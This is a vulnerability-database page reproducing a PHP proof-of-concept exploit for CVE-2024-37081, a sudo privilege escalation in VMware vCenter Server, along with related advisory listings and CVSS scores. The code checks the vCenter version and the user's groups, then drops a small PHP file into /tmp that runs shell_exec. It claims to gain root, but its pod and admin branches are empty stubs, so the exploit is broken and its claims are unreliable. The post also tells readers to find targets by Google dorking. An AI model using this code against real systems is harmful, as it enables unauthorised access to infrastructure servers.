Vulners
Lucene search
VMware vCenter Server 8.0.2 Privilege Escalation
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Exploit for ASP.NET Misconfiguration: Use of Identity Impersonation in Vmware Vcenter_Server | 9 Jul 202416:14 | – | githubexploit |
 | Security Bulletin: Multiple Vulnerabilities in VMware vCenter affect Cloud Pak System [CVE-2024-37079, CVE-2024-37080, CVE-2024-37081] | 3 May 202523:46 | – | ibm |
 | CVE-2024-37081 | 18 Jun 202410:56 | – | circl |
 | VMware vCenter Server Security Vulnerability | 18 Jun 202400:00 | – | cnnvd |
 | CVE-2024-37081 | 18 Jun 202405:43 | – | cve |
 | CVE-2024-37081 | 18 Jun 202405:43 | – | cvelist |
 | Broadcom Advises Urgent Patch for Severe VMware vCenter Server Vulnerabilities | 19 Jun 202414:39 | – | hackread |
 | vCenter Sudo Privilege Escalation | 5 Dec 202418:56 | – | metasploit |
 | Vulnerabilities fixed in VMware vCenter | 18 Jun 202411:46 | – | ncsc |
 | CVE-2024-37081 | 18 Jun 202406:15 | – | nvd |
10
=============================================================================================================================================
| # Title : VMware vCenter Server v 8.0.2 Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.vmware.com |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Exploiting a Vulnerability in VMware vCenter Server to Gain Root Privileges
This script is written in PHP and aims to exploit a problem in the sudo configuration
allowing low-privileged users to gain root privileges.
(Related : https://packetstorm.news/files/id/182981/ Related CVE numbers: CVE-2024-37081 ) .
[+] save code as poc.php.
[+] PayLoad :
<?php
/**
*
* @author Indoushka
*/
class VCenterExploit {
private $writableDir;
private $timeout;
private $user;
private $groups;
private $isWindows;
public function __construct($writableDir = '/tmp', $timeout = 30) {
$this->writableDir = $writableDir;
$this->timeout = $timeout;
$this->isWindows = (PHP_OS_FAMILY === 'Windows');
}
/**
* تنفيذ أمر على النظام وإرجاع النتيجة (مع دعم Windows)
*/
private function executeCommand($command) {
if ($this->isWindows) {
return shell_exec("cmd /c $command");
}
return shell_exec($command);
}
/**
* التحقق مما إذا كان الدليل قابلاً للكتابة
*/
private function isWritable($dir) {
return is_writable($dir);
}
/**
* الحصول على إصدار vCenter (يدوياً بدلاً من `cat`)
*/
private function getVCenterBuild() {
$filePath = "/etc/vcenter_version"; // المسار في Linux
if (!$this->isWindows && file_exists($filePath)) {
return file_get_contents($filePath);
}
return "غير قادر على تحديد إصدار vCenter";
}
/**
* التحقق مما إذا كان النظام معرضًا للخطر
*/
private function check() {
$vbuild = $this->getVCenterBuild();
if (!preg_match('/(\d+\.\d+\.\d+) build[- ](\d+)/i', $vbuild, $matches)) {
return "غير قادر على تحديد إصدار vCenter من الإخراج: $vbuild";
}
$version = $matches[1] . '.' . $matches[2];
if (!(version_compare($version, '7.0.0', '>') && version_compare($version, '7.0.3.24026615', '<')) &&
!(version_compare($version, '8.0.0', '>') && version_compare($version, '8.0.2.23929136', '<'))) {
return "الإصدار غير قابل للاستغلال: $vbuild";
}
$this->user = trim($this->executeCommand($this->isWindows ? 'whoami' : 'whoami'));
$this->groups = explode(' ', trim($this->executeCommand($this->isWindows ? 'whoami /groups' : 'groups')));
if (in_array($this->user, ['infraprofile', 'vpxd', 'sts', 'pod']) || array_intersect(['operator', 'admin'], $this->groups)) {
return "الإصدار $version والمستخدم ($this->user: " . implode(',', $this->groups) . ") قابل للاستغلال";
}
return "المستخدم غير معرض للخطر أو ليس في المجموعة الصحيحة.";
}
/**
* دالة عامة لاستدعاء `check()`
*/
public function isVulnerable() {
return $this->check();
}
/**
* تنفيذ الاستغلال بناءً على المجموعة التي ينتمي إليها المستخدم
*/
public function exploit() {
if (!$this->isWritable($this->writableDir)) {
die("الدليل غير قابل للكتابة: $this->writableDir");
}
$this->user = trim($this->executeCommand($this->isWindows ? 'whoami' : 'whoami'));
$this->groups = explode(' ', trim($this->executeCommand($this->isWindows ? 'whoami /groups' : 'groups')));
if ($this->user == 'pod') {
$this->exploitPodUser();
} elseif (in_array('operator', $this->groups)) {
$this->exploitOperatorGroup();
} elseif (in_array('admin', $this->groups)) {
$this->exploitAdminGroup();
} else {
die("المستخدم غير معرض للخطر أو ليس في المجموعة الصحيحة.");
}
}
/**
* استغلال ثغرة مجموعة 'operator'
*/
private function exploitOperatorGroup() {
$payloadPath = "$this->writableDir/" . bin2hex(random_bytes(5));
file_put_contents($payloadPath, "<?php echo shell_exec('id'); ?>");
echo "تم رفع الحمولة إلى $payloadPath";
}
/**
* استغلال ثغرة مستخدم 'pod'
*/
private function exploitPodUser() {
echo "استغلال المستخدم pod";
}
/**
* استغلال ثغرة مجموعة 'admin'
*/
private function exploitAdminGroup() {
echo "استغلال مجموعة المسؤولين";
}
}
$exploit = new VCenterExploit();
echo $exploit->isVulnerable();
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Mar 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.8
EPSS0.49873
SSVC